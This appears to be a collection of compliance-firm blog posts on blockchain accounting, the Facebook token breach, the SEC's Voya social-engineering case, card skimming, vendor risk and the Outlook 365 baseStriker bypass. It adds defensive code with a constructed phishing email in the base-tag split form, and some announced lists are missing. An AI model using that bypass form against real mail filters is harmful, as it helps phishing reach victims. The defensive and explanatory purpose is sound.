Blockchain will greatly reduce the costs of maintaining and reconciling ledgers, and will provide absolute certainty over the ownership and history of assets. It facilitates clarity regarding the available resources and obligations of companies, and frees up resources to concentrate on planning and valuation rather than recordkeeping. There are also numerous applications in external audit. Event-level audits incorporated into blockchain technology will enhance both the effectiveness and efficiency of those audits and facilitate greater financial transparency.
The move to a financial system with a significant blockchain element offers many opportunities for the accountancy profession. At least initially, most of these opportunities will be captured by larger accounting firms, which have the resources to devote to the development and implementation of the technology.
As a result, the spectrum of skills represented in the accounting profession will change significantly. Some work, such as reconciliations and provenance assurance, will be reduced or eliminated, while other areas, such as technology, advisory, and other value-additive activities, will expand. When auditing a company with significant blockchain-based transactions, the focus of the auditor will shift from confirming the accuracy or existence of blockchain transactions with external sources to how those transactions are recorded and recognized in financial statements, and how judgmental elements such as valuations are decided.
It may sound like you should replace your accounting staff with a highly technical staff, but that isn’t necessarily true. Accountants don’t need to be blockchain engineers, but they must learn how to advise on blockchain adoption and consider the impact of blockchain on their businesses and clients. They also must act as the bridge, having informed conversations with both technologists and business stakeholders. Most importantly, an accountant’s skills must expand to include an understanding of the features and functions of blockchain.
Accounting Battleground of the Future
In many ways, the future is now. Technology is causing massive disruption in the accounting industry, and the most important factor for the survival of SMB accounting firms is their ability to secure their clients’ data. Malicious actors have shifted their focus from enterprise companies to SMBs because effectiveness is significantly higher and, for the level of effort, data theft is equally profitable. Thus, accounting firms that are SMBs have become the biggest targets of malicious actors; trust and confidentiality are paramount in the accounting industry, and a data breach is the easiest way to lose clients to the competition. While accounting firms are evolving to incorporate more technological expertise, security of data will be one of the most important variables in the equation of continued existence and competitiveness.
Remaining competitive and preparing for growth requires modernizing your technological acumen and expertise. Most importantly, that technological expertise must include acquiring or retaining security expertise, both to ensure that your firm remains compliant with evolving regulations on confidential and sensitive data and to defend your firm against malicious actors.
The future competitiveness of small to medium sized accounting firms will center around strategic technology partnerships, evolving expertise and the ability to secure the data that such firms process. Those who embrace change will be empowered by it while those who resist or hide from change will be passed by it. For accounting professionals who are trying to make it as small to medium sized firms, their survival has never been more dependent on their ability to embrace change…and there is a lot of it coming!
In 2008, to much fanfare, Facebook introduced a new online platform called Facebook Connect, which was proclaimed as “the” scalable SSO (single sign-on) or digital hall pass for the Internet. It has been pitched to companies with a simple proposition: connect to the Facebook platform, and we’ll make it faster and easier for people to use your apps, because users are more apt to sign up for new mobile apps and websites if doing so is easier. In one simple click, a Facebook user can log in to any mobile app or website implementing Facebook Connect with their Facebook password. It also brought an added measure of security, since users wouldn’t need to create and remember new passwords every time they signed up for a new app. Awesome, where do I sign up for this perfect solution, right? A technology platform that provides immense convenience and a streamlined user experience to your customers and can easily be implemented into your technology stack, whether you’re part of an SME or a large enterprise. This “perfect” solution has been adopted by thousands of companies across the globe, ranging from SME marketing companies to large enterprises like Airbnb and Uber.
It’s taken 10 years since its inception, but Facebook Connect doesn’t seem so “perfect” after all and perception has changed from an Internet wide single sign on solution to a global single security nightmare.
Over the past few weeks, Facebook announced that first 50 million, then 30 million account entry keys, created via Facebook Connect, had been stolen in the largest hack in the company’s fourteen-year history. Since the announcement, companies large and small have been scrambling to determine the possible effects on their customers and networks.
On the surface, 30 million users are barely 3% of Facebook’s total userbase; however, the impact of this hack is exponentially bigger because those stolen entry keys can be used to gain access to so many interconnected mobile apps and websites. Stop for a second and think about how many mobile apps and websites use your Facebook account. If you’ve used all ten digits on your hands, hopefully you get the point. If you don’t have a Facebook account, I applaud you. Stats say you’re over 45 years old and you keep a 2018 equivalent of a Motorola flip phone in your back pocket, but you’re still susceptible to the third party risk thanks to your Facebook-loving friends who have your email address, phone number and, if they are really organized, your home and work address in their contacts. Let’s not get into email correspondence, chats, essentially any digital communication between you and your Facebook-loving friends. This hack and its fallout underscore the lengths to which Facebook has cemented itself as the identity of the internet, and what happens when the security systems of one company — trusted by so many — fail.
Buried within Facebook's recent admission was a surprising revelation for its business customers: customers of Facebook Workplace, used by 30,000 businesses as of a year ago, are impacted. If you’re a small/medium enterprise that initially adopted Slack to improve workplace collaboration and efficiency and then migrated to Facebook Workplace, then congratulations, your company may be exposed to serious third party risk thanks to Facebook. Let’s try to determine whether this particular nugget of the Facebook hack poses any third party risk to your company. Back in 2015, Facebook announced that the Royal Bank of Scotland had signed up to use the Workplace beta with the intention to roll it out to 100,000 employees. And when Facebook launched the Workplace product in 2016, it said it already had about 1,000 customers using it. During 2015-16, Facebook Workplace allowed employees to link their Workplace account with their personal Facebook account, and a stolen account entry key lets you read the files and posts in a Workplace community, which is the equivalent of reading work email.
Below are some easy ways to determine your SME’s risk exposure:
Yes, that’s Facebook’s fix to its debacle: force users to log out to invalidate the account entry key/token. Simple enough, an inconvenience to Facebook users, but an even easier “fix”. Let’s review Facebook’s public timeline of this hack and dig a little deeper:
Based on the sophistication of this particular Facebook hack, it’s easy to surmise that the malicious actors were using this exploit long before September 16th and collecting Facebook Connect access tokens. Here’s what really happened:
Facebook has stated that it can’t pinpoint exactly when the malicious actors established the attack chain to exploit 3 separate vulnerabilities, but the vulnerabilities had existed since July 2017. Yikes…
There’s an obvious problem with instructing Facebook Connect users to simply force a log out to “mitigate” this hack. The reality is that Facebook, with all its resources, has few to no solutions for its Facebook Connect users, despite a soon-to-be-released tool that will help SMEs and large enterprises alike identify which accounts may have been tampered with through Facebook Connect.
Facebook's handling of user data has been under scrutiny for the better part of this year, so this hack couldn’t have come at a worse time for Facebook. The company is still reeling from a series of scandals that unfolded in the wake of the 2016 US presidential election: a widespread Russian disinformation campaign leveraged the platform unnoticed, followed by revelations that third-party companies like Cambridge Analytica had collected user data without users’ knowledge. Facebook already faces multiple federal investigations into its privacy and data-sharing practices, including one probe by the Federal Trade Commission and another conducted by the Securities and Exchange Commission. This hack will ramp up efforts to regulate Facebook and other technology companies through financial penalties, legislative efforts or both. In Europe, Facebook could face a fine totaling as much as $1.63 billion if it's found in violation of the General Data Protection Regulation (GDPR), the European Union's sweeping consumer privacy law. GDPR contains a provision that companies can be fined 4% of their annual revenue if they violate the law, which encompasses rules on protecting data and a requirement that regulators be notified within 72 hours of a breach. Ireland's Data Protection Commission, which oversees Facebook under GDPR, is heading up an investigation into the breach.
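Relying parties do have one lever of their own: their local sessions. The store below, an added example that is not Facebook’s code or that of any company named here, binds each app session to the upstream SSO token it was created from and can bulk-invalidate every session derived from a token issued inside the disclosed exposure window, instead of waiting for the provider’s forced logout. The IdP introspection call, the token table and the window end date are constructed placeholders.

```python
"""Relying-party handling of stolen identity-provider (IdP) access tokens.

Added example, not Facebook's code and not from any company mentioned on the
page. An app that lets users sign in with a third-party SSO provider keeps its
own sessions; when the provider announces that access tokens were stolen, the
app should not have to wait for the provider's forced logout. This store binds
each local session to the upstream token it was created from and can invalidate
every session derived from a token issued inside the exposure window. The IdP
token-introspection call is stubbed with a constructed table.
"""
from dataclasses import dataclass
from datetime import datetime, timezone
import hashlib
import secrets


@dataclass
class Session:
    session_id: str
    user_id: str
    idp_token_fingerprint: str     # SHA-256 of the IdP token; the token itself is never stored
    idp_token_issued_at: datetime  # when the IdP minted the token this session came from
    revoked: bool = False


class RelyingPartySessions:
    """Local session store for an app that accepts IdP access tokens."""

    def __init__(self, introspect):
        # introspect(token) -> {"active": bool, "user_id": str, "issued_at": datetime} or None
        self._introspect = introspect
        self._sessions = {}

    @staticmethod
    def fingerprint(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def login_with_idp_token(self, token):
        """Verify the token with the IdP, then mint a local session bound to it."""
        info = self._introspect(token)
        if info is None or not info["active"]:
            raise PermissionError("IdP rejected token")
        session_id = secrets.token_urlsafe(32)
        self._sessions[session_id] = Session(
            session_id, info["user_id"], self.fingerprint(token), info["issued_at"])
        return session_id

    def is_valid(self, session_id):
        s = self._sessions.get(session_id)
        return s is not None and not s.revoked

    def revoke_by_token_issue_window(self, start, end):
        """Invalidate sessions whose upstream token was issued in [start, end]; return the count."""
        n = 0
        for s in self._sessions.values():
            if not s.revoked and start <= s.idp_token_issued_at <= end:
                s.revoked = True
                n += 1
        return n

    def revoke_user(self, user_id):
        """Invalidate every session of one user, e.g. once the IdP names that account as affected."""
        n = 0
        for s in self._sessions.values():
            if not s.revoked and s.user_id == user_id:
                s.revoked = True
                n += 1
        return n


# Constructed stand-in for the IdP's token-introspection endpoint.
_UTC = timezone.utc
SAMPLE_IDP_TOKENS = {
    "tok-alice-old": {"active": True, "user_id": "alice",
                      "issued_at": datetime(2018, 7, 15, tzinfo=_UTC)},
    "tok-bob":       {"active": True, "user_id": "bob",
                      "issued_at": datetime(2018, 9, 20, tzinfo=_UTC)},
    "tok-alice-new": {"active": True, "user_id": "alice",
                      "issued_at": datetime(2018, 10, 1, tzinfo=_UTC)},
    "tok-dead":      {"active": False, "user_id": "carol",
                      "issued_at": datetime(2018, 9, 1, tzinfo=_UTC)},
}


def sample_introspect(token):
    return SAMPLE_IDP_TOKENS.get(token)


# Exposure window: the vulnerabilities existed from July 2017 (per the post above);
# the end date is a placeholder for when the provider reset tokens.
EXPOSURE_START = datetime(2017, 7, 1, tzinfo=_UTC)
EXPOSURE_END = datetime(2018, 9, 28, tzinfo=_UTC)   # placeholder


def demo():
    """Sign in three sessions, apply the exposure window, report which survive."""
    rp = RelyingPartySessions(sample_introspect)
    sids = {t: rp.login_with_idp_token(t) for t in ("tok-alice-old", "tok-bob", "tok-alice-new")}
    revoked = rp.revoke_by_token_issue_window(EXPOSURE_START, EXPOSURE_END)
    return revoked, {t: rp.is_valid(s) for t, s in sids.items()}


if __name__ == "__main__":
    print(demo())  # (2, {'tok-alice-old': False, 'tok-bob': False, 'tok-alice-new': True})
```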
Facebook’s platform relies on trust: users trust that their pictures will be seen only by those in their networks and that their private messages will be read only by the people to whom they were sent. Facebook may look like a juggernaut now, but social networks have fallen before, and this is only the latest in a string of data privacy issues this year alone. This particular hack destroys trust, the very ingredient that attracts its users, and we’ll know quickly about the damage done to Facebook’s brand and its users’ desire to continue using the social platform or take their “business” elsewhere.
Facebook Connect is a platform that levels the playing field between SMEs and large enterprises and streamlines offerings to customers. Roughly 80% of SMEs use Facebook for marketing, which makes the iconic social media platform the most popular tool for small business marketers in the digital world and beyond. With its rise in popularity, Facebook has also become the largest point of third party risk to SMEs, and the recent hack is a testament to this. Not only are SMEs now firmly in the crosshairs of malicious actors, they are fast becoming their favored target because they are often woefully unprepared due to a lack of CapEx/OpEx resources, which translates into little or no cyber security measures in place. With issues like this, they are apt to now go to Google+ as a social media network. I mean, they’re a well known brand and certainly you can trust Google with security and transparency... right?
Cybersecurity SEC Enforcement Action
On 9/26/2018 the Securities and Exchange Commission charged Voya Financial Advisors, Inc. (“VFA”) with violating the Safeguards Rule and the Identity Theft Red Flags Rule, which are designed to protect confidential customer information and protect customers from the risk of identity theft.
The SEC’s Order states that, over a six-day period in 2016, cyber intruders impersonated VFA contractors by calling VFA’s support line and requesting that the contractors’ passwords be reset. The intruders used the new passwords to gain access to the personal information of 5,600 VFA customers. The intruders then used the customer information to create new online customer profiles and obtain unauthorized access to account documents for three customers. VFA failed to terminate the intruders’ access. VFA also failed to apply its procedures to the systems used by its independent contractors, who made up most of VFA’s workforce.
Without admitting or denying the SEC’s findings, VFA agreed to be censured and pay a $1 million penalty, and will retain an independent consultant to evaluate its policies and procedures for compliance with the Safeguards Rule and Identity Theft Red Flags Rule and related regulations.
Although VFA adopted a written Identity Theft Prevention Program, VFA violated the Identity Theft Red Flags Rule because it did not review and update the program in response to changes in risks to its customers. Additionally, VFA did not provide adequate training to its employees and contractors regarding the Identity Theft Prevention Program. Further, the Identity Theft Prevention Program did not include reasonable policies and procedures to respond to identity theft red flags.
Red Flag Rule
The Identity Theft Red Flags Rule requires certain financial institutions and creditors, including broker-dealers and investment advisers registered or required to be registered with the Commission, to develop and implement a written Identity Theft Prevention Program that is designed to detect, prevent, and mitigate identity theft in connection with the opening of a covered account or any existing covered account. An Identity Theft Prevention Program must include reasonable policies and procedures to:
● identify relevant red flags for the covered accounts and incorporate them into the Identity Theft Prevention Program;
● detect the red flags that have been incorporated into the Identity Theft Prevention Program;
● respond appropriately to any red flags that are detected pursuant to the Identity Theft Prevention Program; and
● ensure that the Identity Theft Prevention Program is updated periodically to reflect changes in risks to customers from identity theft.
Identifying Red Flags
To identify Red Flags, firms must consider risk factors including but not limited to:
● The methods by which the firm opens accounts;
● The methods by which the firm grants access to accounts;
● Any previous experiences with identity theft;
● Alerts, notifications or warnings from a credit reporting agency;
● Suspicious documents;
● A social security number, address, or telephone number provided by the applicant or customer that is identical to that of another applicant or customer;
● Suspicious personal identifying information;
● Any unusual use of, or other suspicious activity related to, a covered account; and
● Notification from clients, victims of identity theft, law enforcement authorities or other sources regarding possible identity theft.
Voya was compromised by a well-executed social engineering-based attack, or malicious actors exploiting human behavior. While public perception is often that malicious actors start with a highly technical attack vector to gain access to a victim’s network, social engineering is actually the most common attack vector. Typically, after gaining access to a victim’s internal resources through social engineering, malicious actors will move laterally within a victim’s network. Firewalls and other intrusion prevention methods can be ineffective if employees are tricked into clicking on a malicious link they think came from a Facebook friend or LinkedIn connection. Whatever sophisticated protections a company puts in place, it must implement the right security policies and processes, measure their effectiveness and continuously improve. Otherwise, a crafty malicious actor can continue to adapt his/her social engineering attacks around security measures.
People inherently want to trust, and that's exactly what a successful social engineering attack exploits. If someone sends you an e-mail and it says that it's from another co-worker, you will likely trust it if it relates to something common to you and specific. Once that trust is established, you will have fewer reservations about clicking on links or images in the body of the e-mail. Similarly, if a phone caller has a credible explanation for needing certain information or systems access, then your tendency will be to trust it, since most of the time that request will ultimately be legitimate. Most want to be kind and courteous and are trained to be compliant, especially in a work environment. This is heightened by a sense of frustration with a seemingly bureaucratic process or an expression of urgency... who isn’t busy or frustrated by safety bumps that 95% of the time are not necessary?
Malicious actors will often do weeks and months of background recon work to familiarize themselves with your workplace before stepping foot in your door, phishing your co-workers or making a phone call. Typical preparation might include finding a company phone list or org chart and researching employees on social networking sites like LinkedIn or Facebook. They know time is not on their side, and any request will always demand a prompt response. This is the trap that VFA’s contractors fell into…
Regulatory Focus on Ongoing Review and Assessment of Information Security Policies
As it has for the past three years, in 2018 the SEC’s Office of Compliance Inspections and Examinations (OCIE) announced that it would include cybersecurity as an exam priority and allocated staff for this purpose. Firms and their employees have a responsibility to implement their cybersecurity policies and procedures and an obligation of ongoing monitoring. Aside from adequate technological systems, firms must provide training to both employees and contractors and stress the importance of security for a strong defense against data breaches and fraud. As noted above, from a security standpoint, independent contractors and other third-party vendors are the firm’s responsibility.
Cybersecurity policies and procedures must be reasonably designed to fit your specific business model. The SEC alleged that VFA violated the Safeguards Rule because its policies and procedures to protect customer information and to prevent and respond to cybersecurity incidents were not reasonably designed to meet these objectives.
The VFA action is yet another reminder by the SEC for firms to remain vigilant in their information security program, continue to actively assess not only their risk, but their third party provider risk, and implement controls that are appropriately designed to mitigate this risk.
NCS Regulatory Compliance offers comprehensive cybersecurity assessments to evaluate your current compliance status, analyze your level of vulnerability to attack, and provide guidance to mitigate risk, increase cybersecurity controls, and prevent an inevitable breach that could result in regulatory enforcement and fines. To learn more, contact your compliance consultant.
SEC Press Release: https://www.sec.gov/news/press-release/2018-213
SEC Administrative Proceeding: https://www.sec.gov/litigation/admin/2018/34-84288.pdf
SEC Red Flag Rule: https://www.sec.gov/info/smallbus/secg/identity-theft-red-flag-secg.htm
It’s summer time, sunscreen in your pocket while you’re on vacation at a popular, sunny getaway… or on a business trip. After swiping to cover that delicious dinner, your waiter returns with your credit card, the same card you used for those soft serve ice cream cones. Voilà, a call from a 1-800 number appears on your mobile phone. You let out a deep exhale because you know who’s on the other line: the automated female voice from your card company. You loathe it, you wish there were a way to avoid this annoying occurrence during your vacation, but you can’t, because it’s the Fraud Detection Department calling to verify your transactions after disabling your credit card for protection.
That dreaded phone call has become a standard event during a vacation or any travel outside of your local area and you can thank those pesky card skimmers for this low point of your travels.
What is card skimming?
It is the common moniker for copying the most important information from the magnetic stripes found on credit and debit cards. As you probably guessed, card skimmers take that important information and, through different methods, use it for fraudulent transactions on the internet and/or at physical merchants.
You must be wondering how this is even possible in 2018 because your bank sent you a more “secure” card with a chip and surely, a card skimmer can’t grab vital information from that chip…but then again, think about how many times you swipe your card as opposed to inserting your chip. Yeah, I think we have your attention.
Let’s learn about how card skimming actually works, the different types and most importantly how to avoid it.
How does it actually work?
Card skimming is accomplished through a small device that illegally reads credit card information in an otherwise legitimate credit or debit card transaction. When a credit or debit card is swiped through a skimmer, the device captures and stores all the details, such as card number, expiration date and the card holder's full name stored in the card's magnetic stripe. Card skimmers are often placed over the card swipe mechanism on card readers in all kinds of businesses…but they’re predominantly located in ATMs and gas stations. With ATMs, the crooks may also place a small, undetectable camera nearby to record you entering your PIN. This gives the thief all the information needed to make fake cards and withdraw cash.
Occasionally, retail workers who frequently handle cards are recruited to be part of a skimming ring. These workers use a handheld device to skim your card during a transaction. Remember that great dinner you paid for on vacation? You handed your card to your waiter. The waiter walks away with your card, and for a dishonest waiter, this is the perfect opportunity to swipe your card through a skimmer without detection. For the honest waiter, there may be an undetected card skimmer on the machine, and he/she unknowingly gave your card information to malicious actors.
Once your card information is captured by a card skimmer, the skimming ring will either create a cloned card to make purchases in store, use the account to make online purchases, or sell the information on the internet. You are often unaware of the scam until it’s too late and you notice unauthorized charges on your account, your card is unexpectedly declined, or you receive an overdraft notification in the mail. Now you should have a good understanding of why you get that annoying call from your card company during your travels. The good news is that you generally don’t have to pay, but the bad news is that you may need to resubmit your information to all those businesses that automatically debit your card every month. It’s annoying, but it’s more than that… you feel like you have been violated.
How to Spot a Credit Card Skimmer
It’s very unlikely you’re going to avoid your favorite retail and restaurant spots because you’re leery of workers, but there are ways to become more vigilant and spot a card skimmer.
Best Mitigation Practices
Here are more tips to avoid card skimming.
Card skimming can be devastating to your sacred vacation and personal finances. We rely on our card issuers to notify us quickly and work with us to remove fraudulent charges from our cards. However, there are instances when it’s too late, and those charges have accumulated to billions of dollars of devastation. Stay safe out there, watch out for skimmers and always pick up that dreaded call to verify your transactions.
Seemingly every few months, there’s news of an organization and its subsequent data breach, resulting in its confidential data in the wrong hands. These security lapses have major consequences, ranging from regulatory scrutiny to fines, lawsuits, and consumer dissatisfaction.
While advances in cloud computing and managed services have made IT operations more agile, efficient and streamlined, those benefits have also introduced not only new vendor risks into your organization, but risks that are even closer to your most sensitive data than ever before.
There are four key trends driving the focus on third party/vendor risk management:
● Globalization: As the world gets flatter, organizations with global third-party networks are faced with a multitude of rules, policies, data, standards and regulations.
● Virtualization: Technology has dramatically changed the way organizations operate. With the advent of the cloud, virtual data centers, and hosted apps, companies are using vendors to process their critical business information, thus transferring data outside their firewalls. Recent data breaches and security incidents have highlighted the vendor risks that come with virtualization, and the need to have deeper visibility into the third-party ecosystem.
● Social Media: On one hand social media improves transparency, collaboration, and efficiency across third-party networks. On the other, it brings potential security risks and privacy concerns for business-critical information. The key is to leverage social media to gather third-party intelligence, while also identifying and mitigating the attendant risks.
● Mobility: Ubiquitous access to data across mobile devices poses multiple security risks. As data access becomes easier, and as security breaches proliferate, a strong third party/vendor risk management program is essential to ensure accountability.
Third-party risk has become one of the biggest culprits of data breaches and has drawn the focus of IT leaders. Managing risk, in particular third party/vendor risk, has become an even more central concern. Who wants to work with a partner that’s careless with data? A third party’s reputation can ultimately affect your own organization’s. Outside vendors are an essential part of the technology stack, however, and it’s simply impossible to perform key functions without them. How do you determine whether a vendor will safeguard your data and handle it with the utmost care? This is the essence of third party/vendor risk management.
Third Party/Vendor Risk
It’s rare in 2018 for any organization to conduct all of its operations using only its own resources and personnel. For many, it takes business partners, often called “third party/vendor” partners, to get things done. Whether it’s a bank that uses vendor-managed cloud services to store and analyze its data, or a supermarket that hires an EPOS provider to process its credit card transactions, firms large and small rely on third party partners to manage tasks that frequently involve a high volume of sensitive information.
The question of trust looms large in such partnerships, particularly since an organization is often liable for its third party/vendor functions even though it doesn’t directly carry them out. Third party/vendor risk management has become one of the most important risk issues facing organizations today. In addition to the growth of the vendor risk management profession, senior executives and boards increasingly find themselves involved in third party risk management, as it has become an accepted and important element of a director’s or officer’s fiduciary duty to the company.
The process of assessing third party vendors and conducting security assessments and questionnaires can quickly become overwhelming. Many organizations and governing bodies have their own guidelines. Throw in the increasing complexity of cybersecurity issues and your security team can quickly become buried under a mountain of tasks and processes that are ineffective and don’t actually protect data, customers, partners, and other key stakeholders. Just as cyber risk management requires a whole-of-company approach, a sophisticated vendor risk management program requires governance, policy, training, and technology (tools) to be effective.
Shared Assessments Program
A well known framework to assess third party/vendor risk is the Shared Assessments Program, which is used in over 115 countries and in a variety of industry verticals: financial services, energy, government, healthcare, manufacturing, pharmaceutical, retail, telecommunications, and education. The program is the trusted source for third party/vendor risk management with resources, including tools and best practices, to effectively manage the critical elements of the vendor risk management lifecycle. It follows a two-step approach to managing third party risks. Using industry-established best practices, the Shared Assessments Program follows a “trust, but verify” approach to conducting third party assessments, enabling you to fine-tune your third party risk management program according to your company’s strategy for managing risk.
Program in Depth
The Shared Assessments Program consists of three core tools that your organization can utilize to assess its third party/vendor risk.
There’s a GDPR tool kit as well (we have covered GDPR in a previous blog).
SIG (Standardized Information Gathering) questionnaire:
SIG is based on a comprehensive question library that determines how information technology and data security risks are managed across a broad spectrum of risk control areas. SIG Lite is designed to be completed by a third party vendor facilitating non-critical functions or posing less risk to the requesting organization. SIG Core is the next step up…designed to be completed by vendors supporting critical functions. SIG Lite or SIG Core can be supplemented with additional questions from the SIG library, or the SIG library can be used on its own to do deep dives on targeted risk areas. These aren’t just “check the box” questions and answers. SIG is an in-depth questionnaire that gathers an incredible amount of information. The security domains covered include:
● Risk Management
● Security Policy
● Organizational Security
● Asset Management
● HR Security
● Physical and Environmental Security
● Communications and Operations Management
● Access Control
● Incident Event and Communications Management
● Business Continuity and Disaster Recovery
● Cloud Computing
● Additional Questions
For those who are intimidated by the size of the full SIG, SIG Lite may be the risk assessment framework to consider…it’s essentially a questionnaire covering all of the aforementioned topics, but achieves its goal with a distilled fraction of the questions in the full SIG library and significantly fewer than even the SIG Core library.
SCA (Standardized Control Assessment):
The SCA uses a standardized, efficient, substantiation-based protocol for on-site assessments that allows companies to evaluate their own controls, as well as those of their third-party service providers. Robust third-party risk management is achieved through a continuous re-evaluation of content and frequent updates, ensuring that the SCA remains relevant in terms of both current and emerging best practices. It defines 17 critical risk control areas listed below, procedures, and an on-site assessment reporting template, all of which enhance the efficiency of the assessment process.
● Risk assessment and treatment
● Security policy
● Organizational security
● Asset and information management
● Human resources security
● Physical and environmental security
● Operations management
● Access control
● Application security
● Incident event and communications management
● Business resiliency
● Network security
● Threat management
● Server security
● Cloud security
VRMMM (Vendor Risk Management Maturity Model)
While the SIG and the SCA (formerly called the AUP) are used to identify and evaluate your third party vendor’s risk, the focus of the VRMMM is to provide risk managers with a tool they can use to evaluate their vendor risk program against a comprehensive set of best practices. Essentially, it’s a scoreboard or report card to see how a vendor risk management program stacks up against standard practices.
VRMMM is updated yearly, but below is a list of the high-level components that make up the VRMMM:
● Monitor & Review
● Tools, Measurements & Analysis
● Communication and Information Sharing
● Skills and Expertise
● Vendor Risk Identification and Analysis
● Policies, Standards & Procedures
● Program Governance
Certified Third Party Risk Professional (CTPRP)
The Certified Third Party Risk Professional (CTPRP) designation is the only certification program that validates proficiency in third party risk management concepts and principles, including managing the vendor lifecycle, vendor risk identification and rating, and the fundamentals of third party risk assessment, monitoring and management. Those who pass the exam will have demonstrated working knowledge of each of those areas.
Versatile for Internal Security Program Management
The Shared Assessments framework is a sound process for evaluating third party/vendor risk because it’s a thorough method to establish the security posture of your third parties/vendors. There’s also another pertinent application for this framework: your own organization. The same framework that is used to establish a sense of trust between your organization and its vendors can easily be used to establish trust in your organization’s own security posture and processes. If your organization is a vendor to established businesses, adopting the Shared Assessments framework as a governing document for your own information security program may be particularly compelling. Approaching your program with the Shared Assessments framework with this in mind, your organization can effectively kill two birds with one stone! With that noted, no animals were harmed in the drafting of this blog nor is such harm condoned.
In today’s complex, outsourced environment, it’s critical to step up third party/vendor risk management initiatives to protect both reputation and revenue. Gain a clear view of your third party/vendor relationships and collaborations, and adopt a proactive approach to managing their associated risks. Be well-prepared to manage supply chain disruptions by proactively identifying hidden risks and using well-defined business continuity plans. Also, establish a robust closed-loop process to continuously evaluate third parties based on the Shared Assessments Program. The key is to effectively manage the third-party ecosystem in such a way as to create a culture of transparency and accountability. Lastly, if appropriate for your risk profile, contemplate adopting the Shared Assessments framework as part of your own information security program.
Outlook 365 is a cloud-based email service designed to help meet your organization’s needs for robust security, reliability, and user productivity. It is widely used by enterprises globally for its ease of use, seamless integration, mobile access, and enhanced productivity.
When you move your organization to a cloud service, you must be able to trust your service provider with your most important, sensitive, and confidential data. Microsoft has robust policies, controls, and systems built into Outlook 365 to help keep your information safe. Microsoft’s security team is world class and it covers physical and network security for your email infrastructure. If you migrated from an on-premises/hybrid cloud setup of Outlook to cloud-based Outlook 365, then congratulations. But while Outlook 365 offers a number of built-in data protection features, those features alone are usually not enough for the robust security posture required by the modern enterprise.
Let’s examine a recently discovered Outlook 365 vulnerability and how you can securely configure your Outlook setup to thwart this and similar future vulnerabilities.
Security researchers revealed an attack method to bypass a security feature of Microsoft Outlook 365 that was originally designed to protect users from malware and phishing attacks. Safe Links, part of Microsoft's Advanced Threat Protection (ATP) offering, works by replacing all URLs in an incoming email with Microsoft-owned secure URLs. Every time a user clicks on a link provided in an email, it first sends the user to a Microsoft-owned domain, where it immediately checks the original URL for anything suspicious. If Microsoft's scanners detect any malicious element, it then warns the user about it, and if not, it redirects the user to the original link.
The baseStriker attack sends a malicious link, which would ordinarily be blocked by Microsoft, past security filters by splitting the URL into two snippets of HTML: a base tag and a regular hypertext reference tag. The malicious URL is let through because the email filters do not handle the base HTML tag correctly. ATP only performs the lookup on the base domain and ignores the URL in the rest of the body. Because only part of the URL is tested, it mistakenly appears not to exist in the malicious URL database and the email is let through. Furthermore, Safe Links does not replace the malicious link. Consequently, the user gets the original malicious link and can click it to navigate to the phishing page.
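The defensive lesson in the paragraph above is that a URL filter has to judge the link the mail client will actually navigate to, not the individual HTML fragments it was handed. The following Python is an added illustration of that point, not Microsoft's Safe Links code or anything from the original post: it resolves every `<a href>` against the message's `<base href>` (the way a browser does) before consulting a reputation list, and contrasts that with a per-fragment scan that sees only a host-less relative path. The hostnames, the blocklist and the sample message are all constructed for this example.

```python
"""Resolve e-mail HTML links against <base href> before any reputation check.

Added illustrative code, not Microsoft's Safe Links implementation.
Hostnames, the blocklist and the sample message are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class LinkCollector(HTMLParser):
    """Gathers the document's <base href> (the first one wins) and every <a href>."""

    def __init__(self):
        super().__init__()
        self.base = None
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base" and self.base is None and a.get("href"):
            self.base = a["href"].strip()
        elif tag == "a" and a.get("href") is not None:
            self.hrefs.append(a["href"].strip())


def effective_targets(html):
    """Return the absolute URLs a mail client would really navigate to.

    Resolution happens only after the whole body has been parsed: a <base>
    that appears late in the document (even inside <body>) still rewrites
    every relative link, so a streaming per-tag decision would be wrong.
    """
    p = LinkCollector()
    p.feed(html)
    p.close()
    return [urljoin(p.base or "", h) for h in p.hrefs]


def host_verdict(url, blocklist):
    """Block when the URL's host is on the reputation list, otherwise allow."""
    host = urlsplit(url).hostname
    return "block" if host and host.lower() in blocklist else "allow"


def fragment_scan(html, blocklist):
    """Per-token scan: judges each href attribute on its own, the behaviour the
    text attributes to the bypassed filter. A relative href has no host, so it
    can never match the list."""
    p = LinkCollector()
    p.feed(html)
    p.close()
    return [host_verdict(h, blocklist) for h in p.hrefs]


def base_aware_scan(html, blocklist):
    """Resolve first, then judge the URL the user would actually be sent to."""
    return [host_verdict(u, blocklist) for u in effective_targets(html)]


BLOCKLIST = {"phish.example"}  # constructed reputation list

# Constructed message body in the split form the text describes.
SAMPLE_EMAIL = """<html><head><base href="http://phish.example/"></head>
<body><p>Your mailbox is almost full.</p>
<a href="owa/reset.html">Free up space</a>
<a href="https://portal.example.com/help">Help centre</a></body></html>"""

if __name__ == "__main__":
    print(fragment_scan(SAMPLE_EMAIL, BLOCKLIST))    # ['allow', 'allow']
    print(base_aware_scan(SAMPLE_EMAIL, BLOCKLIST))  # ['block', 'allow']
    print(effective_targets(SAMPLE_EMAIL))
```

The second `<a>` carries an absolute URL, so `urljoin` leaves it untouched and both scans agree on it; only the relative link changes verdict once the base is applied. A message with links but no `<base>` resolves against the empty string, leaving relative paths host-less, which is the correct outcome because nothing in that message could send the reader anywhere.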
In summary, this attack method may be the most severe security flaw in Outlook 365 since the service was created. Unlike other attacks that can be learned and blocked, this vulnerability allows hackers to completely bypass all of Microsoft’s security features and is the email equivalent of a virus that blinds the immune system. Even if the attack is already known, Microsoft does not have a way to see it and lets it through. We have only seen hackers using this vulnerability to send phishing attacks, but it is also capable of distributing ransomware, malware and other malicious content…potentially unleashing risks that its users have not been accustomed to on the platform.
Defense in Depth to Protect Outlook 365
There is no single solution to mitigate the attack described above and it is an example of a failure of controls at many levels. You cannot rely on a single Outlook 365 security feature, such as Safe Links, to reduce the likelihood of that attack, or any other, being successful. A layered defensive strategy using multiple Microsoft security features and controls stands a much better chance of preventing the attacker from succeeding.
The initial phishing attack can be mitigated using Microsoft EOP (Exchange Online Protection) and ATP. These security features go beyond just Safe Links, which was the source of the reported vulnerability. An attacker's email has to make it past every layer of EOP and ATP to successfully reach a user’s Inbox. It may also be removed from an Inbox by ATP if it is later determined that it was malicious, potentially before the user has even read it.
